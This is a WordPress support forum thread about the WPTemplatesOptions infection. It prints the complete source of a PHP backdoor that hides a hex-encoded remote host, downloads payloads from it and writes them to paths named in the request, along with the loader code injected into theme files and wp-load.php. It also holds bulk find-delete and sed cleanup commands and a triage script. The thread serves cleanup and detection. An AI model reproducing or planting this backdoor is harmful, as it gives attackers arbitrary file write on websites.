• Resolved alex80ks

    (@alex80ks)


    Hello,
    This malware was reported maybe two months ago.

    In every single folder of WordPress there's a file called .folder-name.php.

    For example, theme functions gets this code inserted:

    if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . "." . basename(dirname(__FILE__)) . ".php") && !class_exists("WPTemplatesOptions")) {
        include_once($filename);
    }
    
    if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) {
        include_once($filename);
    }

    Here is an example of .folder-name-file.php:

    <?php
    error_reporting(0);                  // hide all PHP errors and warnings
    ini_set('display_errors', false);
    class WPCacheExist
    {
    	public $url;
    	public $baseUrl;
    	public $allow_url_fopen;
    	public $filename;
    	public $data;
    	public $cache;
    	public $error;
    	public $write;
    	public $password;
    
    	// The remote base URL is stored hex-encoded so plain string scans miss it.
    	public function __construct() {
    		$this->baseUrl = hex2bin( '687474703a2f2f636f6e6e6563742e61706965732e6f72672f' );
    		$this->password = $this->baseUrl . 'password';
    		$this->allow_url_fopen = ini_get( 'allow_url_fopen' );
    	}
    
    	// Fetch a URL into $this->data via cURL, falling back to file_get_contents.
    	public function curl( $url ) {
    		if ( function_exists( 'curl_init' ) ) {
    			$ch = curl_init( $url );
    			curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    			if ( curl_exec( $ch ) === false ) {
    				$this->error = curl_error( $ch );
    			} else {
    				$this->data = curl_exec( $ch );
    				return true;
    			}
    			curl_close( $ch );
    		} else if ( function_exists( 'file_get_contents' ) && $this->allow_url_fopen ) {
    			$this->data = file_get_contents( $url );
    			return true;
    		} else {
    			$this->error = 'curl is error';
    		}
    		return false;
    	}
    
    	// Visitor IP; trusts the client-supplied CF-Connecting-IP header when present.
    	public function address() {
    		return (isset( $_SERVER["HTTP_CF_CONNECTING_IP"] ) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER['REMOTE_ADDR']);
    	}
    
    	public function encrypt( $hash ) {
    		try {
    			return md5( sha1( md5( $hash ) ) );
    		} catch ( Exception $e ) {
    			return false;
    		}
    	}
    
    	// Fetches JSON from the remote host and compares the hashed visitor IP
    	// and the request's password hash against it before doing anything.
    	public function authorization() {
    		try {
    			$this->curl( $this->password );
    			$this->data = json_decode( $this->data );
    			if ( $this->strpos( $this->encrypt( $this->address() ), $this->data->address ) ) {
    				if ( $this->data->password === $this->encrypt( $_REQUEST['password'] ) ) {
    					return true;
    				}
    				return false;
    			}
    			return false;
    		} catch ( Exception $e ) {
    			return false;
    		}
    	}
    
    	// Target directory comes straight from the request; nothing limits it to the web root.
    	public function directory() {
    		$directory = __DIR__ . DIRECTORY_SEPARATOR;
    		if ( isset( $_REQUEST['directory'] ) ) {
    			$directory = $directory . $_REQUEST['directory'];
    		}
    		return realpath( $directory );
    	}
    
    	public function filename() {
    		if ( isset( $_REQUEST['filename'] ) ) {
    			$this->filename = $this->directory() . DIRECTORY_SEPARATOR . $_REQUEST['filename'];
    			return true;
    		}
    		$this->error = 'Filename variable is null';
    		return false;
    	}
    
    	// Downloads the payload named in the request from the remote host into $this->data.
    	public function upload() {
    		if ( isset( $_REQUEST['upload'] ) ) {
    			$this->curl( $this->baseUrl . 'upload' . DIRECTORY_SEPARATOR . $_REQUEST['upload'] );
    			return true;
    		}
    		$this->error = 'Upload variable is null';
    		return false;
    	}
    
    	public function answer( $message ) {
    		$data = array(
    			"boolean" => true,
    			"message" => $message,
    		);
    		if ( isset( $this->error ) ) {
    			$data["boolean"] = false;
    			$data["error"] = $this->error;
    		}
    		return json_encode( $data );
    	}
    
    	// Writes the downloaded payload to the requested path (arbitrary file write).
    	public function write() {
    		if ( isset( $this->error ) ) {
    			return false;
    		}
    		if ( function_exists( 'file_put_contents' ) ) {
    			if ( file_put_contents( $this->filename, $this->data ) === false ) {
    				$this->error = 'file_put_contents is error';
    			} else {
    				$this->write = $this->filename;
    				return true;
    			}
    		} else if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
    			$process = fopen( $this->filename, "w+" );
    			if ( fwrite( $process, $this->data ) === false ) {
    				$this->error = 'fwrite is error';
    			} else {
    				$this->write = $this->filename;
    				return true;
    			}
    			fclose( $process );
    
    		} else {
    			$this->error = 'Write is error';
    		}
    		return false;
    	}
    
    	public function strpos( $haystack, $needle, $offset = 0 ) {
    		try {
    			if ( !is_array( $needle ) )
    				$needle = array($needle);
    			foreach ( $needle as $query ) {
    				if ( strpos( $haystack, $query, $offset ) !== false ) {
    					return true;
    				}
    			}
    			return false;
    		} catch ( Exception $e ) {
    			return false;
    		}
    	}
    
    	// Runs when the object is destroyed at script end: fetch a file from the
    	// remote host and write it to disk, then echo a JSON status.
    	public function __destruct() {
    		if ( $this->authorization() ) {
    			$this->upload();
    			$this->filename();
    			$this->write();
    			echo $this->answer( $this->write );
    		}
    	}
    }
    
    new WPCacheExist();
    

    This malware is also creating an index.php which is about 57 KB.

    Will that soon be included in your plugin, and I hope it will be available for free users also?

Viewing 10 replies - 1 through 10 (of 10 total)
    Hello Alex,

    I am also having this malware...

    How to fix? It's driving me crazy!!

    You can also contact me by whatsapp or email
    +31629727358
    [email protected]

    Plugin Support wfphil

    (@wfphil)

    Hi,

    You can send malware samples to [email protected] and we have a site cleaning guide here:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thread Starter alex80ks

    (@alex80ks)

    I sent samples (where I found them, what I found, and most of the behaviour), and if you need access to inspect further, let me know.

    Thank you

    Commands to remove the WPTemplatesOptions malware

    First, run this command to get a list of infected files:

    find -name "*.php" -exec grep -l "WPTemplatesOptions" {} \; > output.txt

    Then run this command to delete the malware files:

    find public_html -name ".*.php" -delete

    Final command, to remove the WPTemplatesOptions strings from website files:

    find public_html -type f -exec sed -i '/WPTemplatesOptions/,+2 d' {} \;

    Thread Starter alex80ks

    (@alex80ks)

    Hello @urshobhit,
    That is just one of the steps.
    Files identified so far are:

    .folder-name.php

    index.php (just the ones with around 56 KB of code)

    .class-wp-cache.php
    (your code will not clean this up because it doesn't contain the word WPTemplatesOptions)

    .json in some of the uploads/month folders.

    WPTemplatesOptions code gets injected in almost every folder that has some existing .php files.

    I hope it helps.

    .class-wp-cache.php can be deleted using this:

    find path -name ".class-wp-cache.php" -delete

    .json can be deleted using this:

    find path -name ".json" -delete

    Thread Starter alex80ks

    (@alex80ks)

    Thank you for sharing @urshobhit

    @alex80ks can you please help me with this.
    “get_checkout_url function is deprecated since version 2.5. Replace with wc_get_checkout_url”

    Plugin Support wfphil

    (@wfphil)

    Hi @qads

    This is the support forum for Wordfence. Please ask WooCommerce for assistance with the above error.

    Hi everyone,

    I have an additional IMPORTANT note about this malware!!!

    CHECK your wp-load.php; if it contains this code:

    if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) {
        foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
            $templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
            if( file_exists( $templates ) ) {
                include_once( $templates );
            }
        }
    }

    urgently follow these steps:
    1. Remove this code from wp-load.php
    2. Find and remove all files ".[dir_name].php" as advised above!
    3. CHANGE ALL PASSWORDS, KEYS AND SALTS in wp-config.php
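A read-only triage script for the indicators named in this thread (the `.<dir>.php` loaders, the WPTemplatesOptions marker that the `sed` command above keys on, and the `.class-wp-cache.php` / `.json` drops), covering both the cleanup post and the wp-load.php check. It is an added example, not code from the thread or from the Wordfence plugin; the function names and report format are assumptions of mine.

```shell
#!/bin/sh
# Read-only triage for the WPTemplatesOptions / WPCacheExist infection
# discussed above: it only reports, so hits can be reviewed (and kept as
# evidence) before any of the delete / sed commands from the thread run.
# Usage: sh wpt_triage.sh /path/to/public_html   (function names are mine)

# Loader files are named ".<parent-dir>.php" (the include is built from
# "." . basename(dirname(__FILE__)) . ".php"), so match each file name
# against its own directory rather than flagging every hidden .php file.
find_loader_files() {
    find "$1" -type f -name '.*.php' | while IFS= read -r f; do
        parent=$(basename "$(dirname "$f")")
        case "$(basename "$f")" in
            ".$parent.php") printf '%s\n' "$f" ;;
        esac
    done
}

# Injected include blocks (theme functions.php, wp-load.php, ...): the
# marker that the thread's sed '/WPTemplatesOptions/,+2 d' keys on.
find_marker_hits() {
    grep -rl --include='*.php' 'WPTemplatesOptions' "$1"
}

# Secondary drops named in the thread that carry no marker string.
find_secondary_files() {
    find "$1" -type f \( -name '.class-wp-cache.php' -o -name '.json' \)
}

# Print tagged findings; return 0 when clean, 1 when anything was found,
# so the status can gate a cleanup step.
scan_report() {
    root=$1
    report=$( {
        find_loader_files "$root"    | sed 's/^/loader:    /'
        find_marker_hits "$root"     | sed 's/^/marker:    /'
        find_secondary_files "$root" | sed 's/^/secondary: /'
    } )
    if [ -z "$report" ]; then
        echo "clean: no WPTemplatesOptions indicators under $root"
        return 0
    fi
    printf '%s\n' "$report"
    echo "INFECTED: $(printf '%s\n' "$report" | wc -l | tr -d ' ') indicator(s); review before deleting"
    return 1
}

[ "$#" -eq 0 ] || scan_report "$1"
```

Run it against a copy of the site first; a non-zero exit status means at least one indicator was found and the report lists each path with its type.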

  • The topic ‘Have you cover this malware yet?’ is closed to new replies.